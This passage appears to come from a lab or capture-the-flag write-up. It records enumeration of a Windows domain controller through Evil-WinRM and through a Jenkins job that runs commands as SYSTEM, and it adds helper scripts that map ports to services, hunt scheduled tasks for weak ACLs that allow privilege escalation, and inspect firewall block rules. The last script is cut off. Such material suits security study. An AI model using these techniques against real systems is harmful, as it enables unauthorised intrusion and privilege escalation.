740 36 105272 44212 5772 1 ServerManager
621 14 5676 13544 620 0 services
705 29 15160 52528 5724 1 ShellExperienceHost
444 17 4760 24612 2336 1 sihost
53 3 500 1212 288 0 smss
127 15 3788 7968 308 0 svchost
206 12 1644 7304 328 0 svchost
172 9 1552 7468 476 0 svchost
205 11 2620 11860 560 0 svchost
179 9 1724 11960 700 0 svchost
214 12 1956 9900 800 0 svchost
86 5 888 3900 832 0 svchost
924 20 6804 22228 856 0 svchost
868 20 5900 12756 900 0 svchost
261 10 2084 7932 940 0 svchost
216 9 2236 7704 1036 0 svchost
257 14 3264 9332 1068 0 svchost
407 14 14264 18840 1148 0 svchost
226 12 2764 12912 1200 1 svchost
184 10 2060 8984 1224 0 svchost
274 13 4048 11096 1236 0 svchost
371 18 5204 13376 1284 0 svchost
284 16 3272 12424 1304 0 svchost
403 32 9980 19108 1324 0 svchost
236 12 2600 11684 1340 0 svchost
253 14 3140 13960 1364 0 svchost
147 7 1204 5712 1400 0 svchost
440 9 2760 8992 1416 0 svchost
178 12 1792 8376 1540 0 svchost
334 10 2536 8596 1556 0 svchost
401 18 5160 14508 1564 0 svchost
316 13 2036 8968 1636 0 svchost
187 11 2060 12012 1696 0 svchost
161 9 1688 6892 1784 0 svchost
155 8 2164 7468 1820 0 svchost
224 12 2236 9316 1844 0 svchost
471 20 3484 12568 1880 0 svchost
394 15 13540 23200 1920 0 svchost
217 12 2048 7332 2040 0 svchost
222 10 2268 9168 2104 0 svchost
164 10 2032 7676 2376 0 svchost
289 21 3744 13736 2400 0 svchost
208 11 2376 8640 2556 0 svchost
164 9 4124 11904 2716 0 svchost
138 8 1480 6284 2808 0 svchost
231 14 4544 11940 2968 0 svchost
135 9 1672 6668 2976 0 svchost
176 11 2236 13580 2984 0 svchost
455 21 20884 35800 2992 0 svchost
168 12 3888 10828 3008 0 svchost
248 25 3532 12748 3016 0 svchost
143 7 1356 5796 3032 0 svchost
403 26 3552 13128 3276 0 svchost
373 19 5612 27832 3460 1 svchost
316 18 6844 23316 3908 0 svchost
167 9 3244 8008 4604 0 svchost
187 15 6048 10208 4740 0 svchost
168 11 2416 13240 4804 0 svchost
155 9 2004 6944 4836 0 svchost
331 16 17072 19120 6888 0 svchost
322 20 9472 15580 7064 0 svchost
1919 0 192 136 4 0 System
320 19 5772 14700 1828 1 taskhostw
213 20 4016 12568 4336 1 taskhostw
214 16 2392 10568 3560 0 vds
169 11 2924 10936 2896 0 VGAuthService
138 9 1796 7476 1140 1 vm3dservice
144 8 1708 7004 2876 0 vm3dservice
263 19 5268 1548 592 1 vmtoolsd
392 22 10592 22736 2888 0 vmtoolsd
173 11 1468 6708 480 0 wininit
281 12 2708 12660 544 1 winlogon
431 22 12036 25452 3732 0 WmiPrvSE
1086 38 79872 110048 5.22 5536 0 wsmprovhost
explorer
Processes (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins3001985331849935005.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 88 N/A
smss.exe 288 N/A
csrss.exe 372 N/A
wininit.exe 480 N/A
csrss.exe 488 N/A
winlogon.exe 544 N/A
services.exe 620 N/A
lsass.exe 640 Kdc, KeyIso, Netlogon, SamSs
svchost.exe 832 PlugPlay
svchost.exe 856 BrokerInfrastructure, DcomLaunch, Power,
SystemEventsBroker
svchost.exe 900 RpcEptMapper, RpcSs
svchost.exe 940 LSM
dwm.exe 244 N/A
svchost.exe 308 nsi
svchost.exe 328 W32Time
svchost.exe 800 NcbService
svchost.exe 700 TimeBrokerSvc
svchost.exe 1036 Dhcp
svchost.exe 1068 Dnscache
svchost.exe 1148 EventLog
svchost.exe 1236 DsmSvc
svchost.exe 1284 NlaSvc
svchost.exe 1304 gpsvc
svchost.exe 1324 BFE, mpssvc
svchost.exe 1340 ProfSvc
svchost.exe 1400 Themes
svchost.exe 1416 EventSystem
svchost.exe 1540 SENS
svchost.exe 1556 netprofm
svchost.exe 1564 Schedule
svchost.exe 1636 Wcmsvc
svchost.exe 1696 ShellHWDetection
svchost.exe 1784 FontCache
svchost.exe 1820 WinHttpAutoProxySvc
svchost.exe 1844 LanmanWorkstation
svchost.exe 1920 Winmgmt
svchost.exe 1880 iphlpsvc
svchost.exe 2104 UserManager
svchost.exe 2376 PolicyAgent
svchost.exe 2556 LanmanServer
fontdrvhost.exe 2696 N/A
fontdrvhost.exe 2704 N/A
Microsoft.ActiveDirectory 2720 ADWS
svchost.exe 2808 SysMain
vm3dservice.exe 2876 vm3dservice
vmtoolsd.exe 2888 VMTools
VGAuthService.exe 2896 VGAuthService
svchost.exe 2968 W3SVC, WAS
svchost.exe 2976 SstpSvc
svchost.exe 2984 WpnService
svchost.exe 2992 DiagTrack
ismserv.exe 3000 IsmServ
svchost.exe 3008 AppHostSvc
svchost.exe 3016 CryptSvc
svchost.exe 3032 CoreMessagingRegistrar
dns.exe 3040 DNS
dfsrs.exe 2220 DFSR
svchost.exe 2400 WinRM
svchost.exe 2040 tapisrv
vm3dservice.exe 1140 N/A
dfssvc.exe 3108 Dfs
svchost.exe 3276 RasMan
vds.exe 3560 vds
dllhost.exe 3708 COMSysApp
WmiPrvSE.exe 3732 N/A
msdtc.exe 4008 MSDTC
svchost.exe 4836 lmhosts
sihost.exe 2336 N/A
svchost.exe 1200 CDPUserSvc_7b03f
svchost.exe 3460 WpnUserService_7b03f
taskhostw.exe 4336 N/A
svchost.exe 560 TokenBroker
cmd.exe 2328 N/A
svchost.exe 476 TabletInputService
cmd.exe 492 N/A
svchost.exe 2716 StateRepository
ctfmon.exe 4412 N/A
conhost.exe 1356 N/A
svchost.exe 1364 CDPSvc
conhost.exe 68 N/A
explorer.exe 5148 N/A
ShellExperienceHost.exe 5724 N/A
ServerManager.exe 5772 N/A
SearchUI.exe 5848 N/A
RuntimeBroker.exe 5924 N/A
RuntimeBroker.exe 6032 N/A
RuntimeBroker.exe 5280 N/A
jenkins.exe 5816 Jenkins
java.exe 5380 N/A
conhost.exe 5436 N/A
vmtoolsd.exe 592 N/A
svchost.exe 6888 DPS
svchost.exe 7064 UALSVC
svchost.exe 3908 UsoSvc
LogonUI.exe 3448 N/A
svchost.exe 4804 LicenseManager
svchost.exe 4740 DsSvc
svchost.exe 1224 StorSvc
taskhostw.exe 1828 N/A
svchost.exe 4604 PcaSvc
wsmprovhost.exe 5536 N/A
conhost.exe 5056 N/A
PING.EXE 4332 N/A
PING.EXE 6760 N/A
cmd.exe 1656 N/A
conhost.exe 4916 N/A
tasklist.exe 2112 N/A
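The netstat -ano and tasklist /svc listings above are only useful together, since the PID is the link between a listening port and the service behind it (640 = lsass.exe hosting Kdc/Netlogon, 3040 = dns.exe, 5380 = java.exe for Jenkins). The following Python helper is an added example, not code from the original writeup: it parses saved copies of both outputs offline, joins them by PID, and labels each listener with its owning image, its services, and whether it is bound to all interfaces. The embedded sample lines are copied from the output above; the helper also handles tasklist's wrapped service lists and its 25-character image-name truncation (which is why "Microsoft.ActiveDirectory" appears cut off).

```python
"""Join `netstat -ano` listeners with `tasklist /svc` entries by PID (added example)."""
import re

# Constructed sample: a handful of lines copied from the captured output above,
# not the full listings.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       640
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       640
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       5380
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2720
  TCP    10.10.11.132:53        0.0.0.0:0              LISTENING       3040
  TCP    10.10.11.132:5985      10.10.16.5:36192       TIME_WAIT       0
  TCP    [::]:389               [::]:0                 LISTENING       640
  UDP    0.0.0.0:123            *:*                                    328
  UDP    [dead:beef::20c]:88    *:*                                    640
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Services
========================= ======== ============================================
System                           4 N/A
lsass.exe                      640 Kdc, KeyIso, Netlogon, SamSs
svchost.exe                    328 W32Time
svchost.exe                    856 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
Microsoft.ActiveDirectory     2720 ADWS
dns.exe                       3040 DNS
java.exe                      5380 N/A
"""

# UDP rows have no State column, so the state group is optional.
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)
# tasklist /svc truncates image names to 25 characters; a wrapped service
# list continues on an indented line that carries no image name or PID.
TASKLIST_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<services>.*?)\s*$")


def _split_services(field):
    """Turn 'Kdc, KeyIso,' into ['Kdc', 'KeyIso']; 'N/A' means no service."""
    return [s.strip() for s in field.split(",") if s.strip() and s.strip() != "N/A"]


def parse_tasklist(text):
    """Map PID -> {'image': str, 'services': [str]} from tasklist /svc output."""
    procs, last_pid = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace() and last_pid is not None:
            procs[last_pid]["services"].extend(_split_services(line))  # wrapped row
            continue
        m = TASKLIST_RE.match(line)
        if not m:
            continue  # header and separator lines carry no PID
        last_pid = int(m.group("pid"))
        procs[last_pid] = {"image": m.group("image"),
                           "services": _split_services(m.group("services"))}
    return procs


def parse_netstat(text):
    """Return one dict per socket row of netstat -ano output."""
    socks = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        host, _, port = m.group("local").rpartition(":")  # keeps IPv6 brackets intact
        socks.append({"proto": m.group("proto"), "host": host, "port": int(port),
                      "state": m.group("state") or "", "pid": int(m.group("pid"))})
    return socks


def listeners(netstat_text, tasklist_text):
    """Listening sockets joined to their owning process, sorted by port."""
    procs = parse_tasklist(tasklist_text)
    rows = []
    for s in parse_netstat(netstat_text):
        if s["proto"] == "TCP" and s["state"] != "LISTENING":
            continue  # drop ESTABLISHED / TIME_WAIT rows (PID 0 for the latter)
        proc = procs.get(s["pid"], {"image": "<unknown pid>", "services": []})
        rows.append({**s, "image": proc["image"], "services": list(proc["services"]),
                     "all_interfaces": s["host"] in ("0.0.0.0", "[::]")})
    rows.sort(key=lambda r: (r["port"], r["proto"], r["host"]))
    return rows


def format_table(rows):
    """Render the joined rows as a plain-text table for triage notes."""
    lines = [f"{'PROTO':5} {'LOCAL':28} {'PID':>5} {'IMAGE':26} {'SERVICES':30} ALL-IF"]
    for r in rows:
        local = f"{r['host']}:{r['port']}"
        lines.append(f"{r['proto']:5} {local:28} {r['pid']:>5} {r['image']:26} "
                     f"{', '.join(r['services']) or '-':30} {'yes' if r['all_interfaces'] else 'no'}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_table(listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE)))
```

Run it against the full saved outputs (for example `listeners(open("netstat.txt").read(), open("tasklist.txt").read())`) to get the complete port-to-service map; the Kerberos/LDAP ports on lsass.exe confirm the host is a domain controller, and 8080 on java.exe bound to all interfaces is the Jenkins listener.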
Tasks
*Evil-WinRM* PS C:\Users\oliver\Documents> cmd /c schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level" | findstr /v /i "system32"
cmd.exe : Access is denied.
+ CategoryInfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\oliver\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
Cannot connect to CIM server. Access denied
At line:1 char:1
+ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft ...
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (MSFT_ScheduledTask:String) [Get-ScheduledTask], CimJobException
+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-ScheduledTask
Tasks (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins13166471713795385725.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level" | findstr /v /i "system32"
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
Server Initial Configuration Task N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
.NET Framework NGEN v4.0.30319 N/A Ready
.NET Framework NGEN v4.0.30319 64 N/A Ready
.NET Framework NGEN v4.0.30319 64 Critic N/A Disabled
.NET Framework NGEN v4.0.30319 Critical N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management N/A Disabled
AD RMS Rights Policy Template Management N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
PolicyConverter N/A Disabled
VerifiedPublisherCertStoreCheck N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft Compatibility Appraiser 9/21/2023 3:24:53 AM Ready
ProgramDataUpdater N/A Ready
StartupAppTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
appuriverifierdaily N/A Ready
appuriverifierinstall N/A Ready
CleanupTemporaryState N/A Ready
DsSvcCleanup N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Pre-staged app cleanup N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Proxy N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
BitLocker Encrypt All Drives N/A Ready
BitLocker MDM policy Refresh N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
UninstallDeviceTask N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
BgTaskRegistrationMaintenanceTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ProactiveScan N/A Ready
SyspartRepair N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
License Validation N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
CreateObjectTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Consolidator 9/20/2023 12:00:00 PM Ready
UsbCeip N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Data Integrity Scan 9/25/2023 11:03:09 AM Ready
Data Integrity Scan for Crash Recovery N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ScheduledDefrag N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Device 9/21/2023 4:17:14 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Scheduled N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
DXGIAdapterCache N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SilentCleanup N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft-Windows-DiskDiagnosticDataColl N/A Disabled
Microsoft-Windows-DiskDiagnosticResolver N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Diagnostics N/A Ready
StorageSense N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
EDP App Launch Task N/A Ready
EDP Auth Task N/A Ready
StorageCardEncryption Task N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ExploitGuard MDM policy Refresh N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Property Definition Sync N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
ReconcileFeatures N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
RefreshCache 9/21/2023 2:53:30 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ScanForUpdates N/A Disabled
ScanForUpdatesAsUser N/A Disabled
SmartRetry N/A Disabled
WakeUpAndContinueUpdates N/A Disabled
WakeUpAndScanForUpdates N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
TempSignedLicenseExchange N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Notifications N/A Ready
WindowsActionDialog N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
WinSAT N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
MapsToastTask N/A Disabled
MapsUpdateTask N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
ProcessMemoryDiagnosticEvents N/A Disabled
RunFullMemoryDiagnostic N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
MNO Metadata Parser N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
LPRemove N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SystemSoundsService N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
GatherNetworkInfo N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Background Synchronization N/A Disabled
Logon Synchronization N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Server Manager Performance Monitor N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Device Install Group Policy N/A Ready
Device Install Reboot Required N/A Ready
Sysprep Generalize Drivers N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
AnalyzeSystem N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
LoginCheck N/A Disabled
Registration N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
VerifyWinRE N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
CleanupOldPerfLogs N/A Ready
ServerManager N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
StartComponentCleanup N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Account Cleanup N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
CreateObjectTask N/A Ready
IndexerAutomaticMaintenance N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Collection N/A Disabled
Configuration N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SpaceAgentTask N/A Ready
SpaceManagerTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
HeadsetButtonPress N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Storage Tiers Management Initialization N/A Ready
Storage Tiers Optimization N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
MsCtfMonitor N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ForceSynchronizeTime N/A Ready
SynchronizeTime N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SynchronizeTimeZone N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
UPnPHostConfig N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Windows Defender Cache Maintenance N/A Ready
Windows Defender Cleanup N/A Ready
Windows Defender Verification N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
QueueReporting 9/20/2023 6:51:42 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
UpdateLibrary N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Calibration Loader N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Scheduled Start 9/21/2023 1:53:27 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
CacheTask N/A Running
TaskName Next Run Time Status
======================================== ====================== ===============
Automatic-Device-Join N/A Ready
Recovery-Check N/A Disabled
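A caveat on the listing above: the findstr chain drops every line containing "\Microsoft", which removes the "Folder: \Microsoft\..." header lines but not the tasks inside those folders. That is why the only surviving Folder: line is the root folder (which has no tasks) and why the rest of the table is orphaned header blocks full of built-in tasks such as the .NET NGEN and Windows Defender maintenance tasks. The following is an added example, not part of the original notes, that applies the vendor filter to the task path itself, using the CSV output of schtasks, and surfaces the two things that matter for privilege escalation: who the task runs as and whether a low-privileged principal can replace its target binary. It is meant for the SYSTEM (Jenkins) context, since schtasks was denied over WinRM; the column names are the ones schtasks /V emits, while the list of broad principals and the command-line parsing are assumptions.

```powershell
# Added example (not from the original notes): enumerate non-Microsoft scheduled
# tasks correctly and check their target binaries for weak ACLs.

function Get-ExecutablePath {
    # Pull the program out of a "Task To Run" string. Quoted paths are exact;
    # unquoted ones fall back to the first token (heuristic, assumed).
    param([string]$CommandLine)
    if (-not $CommandLine) { return $null }
    $cl = $CommandLine.Trim()
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -gt 1) { return $cl.Substring(1, $end - 1) }
    }
    return ($cl -split '\s+')[0]
}

function Test-WeakFileAcl {
    # True when a broad principal holds a right that lets it replace the file.
    # Evaluated statically from the ACL, so the answer is meaningful even when
    # the script itself runs as SYSTEM.
    param([string]$Path)
    # Assumed list of principals a low-privileged user is a member of.
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    $weak  = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broad -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $weak) -ne 0) { return $true }
    }
    return $false
}

function Get-NonMicrosoftTask {
    param([string]$IgnorePrefix = '\Microsoft\')   # vendor-shipped folder to drop
    # /V adds "Task To Run", "Run As User" and "Scheduled Task State".
    # schtasks repeats the CSV header once per folder, so drop those rows.
    $rows = schtasks /Query /FO CSV /V 2>$null | ConvertFrom-Csv |
        Where-Object { $_.TaskName -and $_.TaskName -ne 'TaskName' }
    foreach ($row in $rows) {
        # TaskName in CSV output is the full path, e.g. \Microsoft\Windows\...\Name
        if ($row.TaskName.StartsWith($IgnorePrefix, [System.StringComparison]::OrdinalIgnoreCase)) { continue }
        $exe = Get-ExecutablePath $row.'Task To Run'
        $exe = if ($exe) { [Environment]::ExpandEnvironmentVariables($exe) }
        [pscustomobject]@{
            TaskName   = $row.TaskName
            RunAsUser  = $row.'Run As User'
            State      = $row.'Scheduled Task State'
            Command    = $row.'Task To Run'
            # $null when the target is missing or is an interpreter found via PATH
            TargetWeak = if ($exe -and (Test-Path -LiteralPath $exe)) { Test-WeakFileAcl $exe } else { $null }
        }
    }
}

Get-NonMicrosoftTask | Format-Table -AutoSize -Wrap
```

A row with RunAsUser of SYSTEM (or a domain admin) and TargetWeak of True is a direct privilege-escalation path; a row whose target is missing is worth a second look at the parent directory's ACL, which this example does not check.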
Firewall & AV
*evil-winrm* PS C:\Users\oliver\Documents> cmd /c netsh firewall show config ; Get-NetFirewallProfile | Format-Table Name, Enabled
Domain profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Service configuration for Domain profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Enable Inbound Remote Mouse Core / C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
Enable Inbound Remote Mouse / C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
Standard profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Enable Yes Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Cannot connect to CIM server. Access denied
At line:1 char:37
+ cmd /c netsh firewall show config ; Get-NetFirewallProfile | Format-T ...
+ ~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (MSFT_NetFirewallProfile:String) [Get-NetFirewallProfile], CimJobException
+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-NetFirewallProfile
*evil-winrm* PS C:\Users\oliver\Documents> Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property ExclusionPath
Cannot connect to CIM server. Access denied
At line:1 char:1
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (MSFT_MpComputerStatus:String) [Get-MpComputerStatus], CimJobException
+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpComputerStatus
Cannot connect to CIM server. Access denied
At line:1 char:24
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (MSFT_MpPreference:String) [Get-MpPreference], CimJobException
+ FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-MpPreference
Firewall & AV (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins11098617683419096266.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>netsh firewall show config && powershell -ep bypass -c Get-NetFirewallRule -Enabled True -Action Block
Domain profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Service configuration for Domain profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Enable Inbound Remote Mouse Core / C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
Enable Inbound Remote Mouse / C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
Standard profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Enable Yes Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Name : {D9E87628-9EE4-42D7-9D44-BD43476313DD}
DisplayName : BlockDCInbound
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Block
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
Name : {D6399A8B-5E04-458F-AA68-62F64A4F1F43}
DisplayName : BlockOutboundDC
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Outbound
Action : Block
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
Note the two custom rules above: BlockDCInbound (Inbound) and BlockOutboundDC (Outbound) are both enabled Block rules bound to Profile Any. Get-NetFirewallRule does not show a rule's port, address or program filters, so this listing alone does not say which traffic the two rules actually cover.
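The following is an added example, not part of the original notes, that joins each enabled Block rule to the separate port, address and application filter objects that define its scope, and flags rules whose every filter is Any (a catch-all that blocks the whole direction regardless of the profile's default action). It needs a working CIM session, i.e. the SYSTEM (Jenkins) context here, since the WinRM session got "Cannot connect to CIM server". The PolicyStore default matches the PolicyStoreSource shown above; the cmdlets and property names are the NetSecurity module's own.

```powershell
# Added example (not from the original notes): resolve what enabled Block rules match.

function Get-BlockRuleDetail {
    param([string]$PolicyStore = 'PersistentStore')   # matches PolicyStoreSource above
    Get-NetFirewallRule -PolicyStore $PolicyStore -Enabled True -Action Block | ForEach-Object {
        $rule = $_
        # Each filter is a separate CIM object keyed by the rule; all accept the rule on the pipeline.
        $port = $rule | Get-NetFirewallPortFilter
        $addr = $rule | Get-NetFirewallAddressFilter
        $app  = $rule | Get-NetFirewallApplicationFilter
        [pscustomobject]@{
            Rule          = $rule.DisplayName
            Direction     = $rule.Direction
            Profile       = $rule.Profile
            Protocol      = $port.Protocol
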